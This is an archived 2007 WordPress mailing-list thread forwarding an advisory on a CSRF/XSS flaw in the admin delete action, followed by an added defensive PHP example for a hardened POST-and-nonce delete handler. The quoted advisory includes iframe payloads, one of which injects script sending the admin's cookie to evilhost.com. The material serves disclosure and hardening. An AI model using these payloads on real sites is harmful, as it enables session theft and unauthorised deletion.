[wp-hackers] FW: [Full-disclosure] WordPress AdminPanel CSRF/XSS - 0day

howard chen howachen at gmail.com
Tue Feb 27 16:47:25 GMT 2007


Can WP allow delete/update actions through HTTP GET?


On 2/27/07, Dr. Mike Wendell <theapparatus at gmail.com> wrote:
> *chuckle* And folks wonder why iframes get stripped out in wpmu and wp.com.
>
> On 2/26/07, Ross M. W. Bennetts <ross.bennetts at une.edu.au> wrote:
> > Exploit:
> >
> > Cookie in an Alert Box:
> > <iframe width=600 height=400
> > src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript
> > %3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>
> >
> > Cookie send to an Evil Host:
> > <iframe width=600 height=400
> > src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript
> > %3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/
> > datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe>
> --
> Blog: http://drmikessteakdinner.com
> Kim Possible: Remixed: http://kimpossibleremixed.com
> Get your own free hosted WordPress Blog today: http://daria.be
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
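The question in this thread (whether a delete/update action should be reachable over GET) is really a question of how such a handler should be written; the following is an added example, not WordPress core's post.php and not code from anyone in the thread. It assumes it runs inside WordPress so the core functions it calls (check_admin_referer, absint, current_user_can, wp_delete_post, wp_nonce_field, esc_*) are available; the nonce action name "delete-post_{id}" is a constructed choice.

```php
<?php
// Added example, not WordPress core code. Assumes the WordPress runtime is loaded.

// Render the delete control as a POST form carrying a per-post nonce, instead of a
// bare GET link. Every value that ends up in markup is escaped for its context.
function delete_post_form(int $post_id): string {
    $title = get_the_title($post_id);
    return '<form method="post" action="' . esc_url(admin_url('post.php')) . '">'
        . '<input type="hidden" name="action" value="delete">'
        . '<input type="hidden" name="post" value="' . esc_attr((string) $post_id) . '">'
        . wp_nonce_field('delete-post_' . $post_id, '_wpnonce', true, false)
        . '<button type="submit">Delete "' . esc_html($title) . '"</button>'
        . '</form>';
}

// Handle the submitted form. Each check closes one part of the problem described
// in the advisory: GET-triggered state change, forged requests, and a parameter
// value reflected into the page unvalidated.
function hardened_delete_post_handler(): void {
    // 1. State changes only on POST: an <iframe src=...> or a plain link cannot
    //    trigger this branch at all.
    if ('POST' !== $_SERVER['REQUEST_METHOD']) {
        wp_die(esc_html__('Deleting a post requires a POST request.'), 405);
    }

    // 2. Validate before use: a post id is a positive integer and nothing else.
    //    absint() turns a value like "'><script>..." into 0, which is rejected,
    //    and the raw value is never echoed back to the browser.
    $post_id = isset($_POST['post']) ? absint($_POST['post']) : 0;
    if (0 === $post_id) {
        wp_die(esc_html__('Invalid post id.'), 400);
    }

    // 3. Nonce: the request must carry the token issued with the form for this
    //    specific post, so a page on another host cannot forge it for this user.
    check_admin_referer('delete-post_' . $post_id);

    // 4. Capability: the nonce proves intent, not authority.
    if (!current_user_can('delete_post', $post_id)) {
        wp_die(esc_html__('You are not allowed to delete this post.'), 403);
    }

    wp_delete_post($post_id, true);

    // 5. Report the result via a redirect to an integer-only query argument rather
    //    than by reflecting request input into the response body.
    wp_safe_redirect(add_query_arg('deleted', $post_id, admin_url('edit.php')));
    exit;
}
```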

